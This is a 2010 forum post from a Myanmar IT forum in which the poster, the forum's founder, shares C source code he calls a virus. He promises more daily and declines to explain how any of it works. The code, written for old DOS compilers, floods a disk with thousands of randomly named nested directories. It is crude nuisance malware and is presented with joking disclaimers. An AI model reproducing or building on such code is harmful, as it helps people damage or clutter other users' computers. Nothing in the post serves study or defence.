Myanmar IT Resource Forum
Myanmar IT Resource Forum
Myanmar IT Resource Forum

You are not connected. Please login or register

View previous topic View next topic Go down  Message [Page 1 of 1]

1C++ Virus Source Codes Empty C++ Virus Source Codes 3rd January 2010, 6:01 pm

sHa92

sHa92
Founder



Founder
/* Virus Codes Sharing by $ƴǩǾ
From Now, I'll share you the Virus source codes from my source codes library everyday.
I am sure that you can't find all of my codes over the internet.
If you want to know where I got this codes, just PM me. I will tell you. Razz
I'll never explain how these codes work. So, Don't Ask me. Try your self.

Use this program at your own risk. Don't blame me if you accidentally combine & run it on your own computer.

I just want to share this with everyone to show you how easy it is to write a virus. hee hee Razz Razz

Share your knowledge and experience with other members in MITR, and we share ours with you.

*/

#include <stdio.h>
#include <stdlib.h>
#include <dir.h>

main()
{
int i,j;
char tmp[20];
char far *ptr;

for (i=0;i<=50;i++){
srand(rand());
ptr = itoa(rand(),tmp,10);
mkdir ( ptr );
chdir ( ptr );
for (j=0;j<=50;j++){
ptr = itoa(rand(),tmp,10);
mkdir( ptr );
}
chdir ("\\");
}
}

/*
This program is not intended for general distribution -- irresponsible users should not be allowed access to this program, or its accompanying files. (Unlike people like us, of course...)
More Virus Codes are Comming Soon...
*/

http://www.myanmaritresource.info

View previous topic View next topic Back to top  Message [Page 1 of 1]

Permissions in this forum:
You cannot reply to topics in this forum

 

Free forum | ©phpBB | Free forum support | Report an abuse | Forumotion.com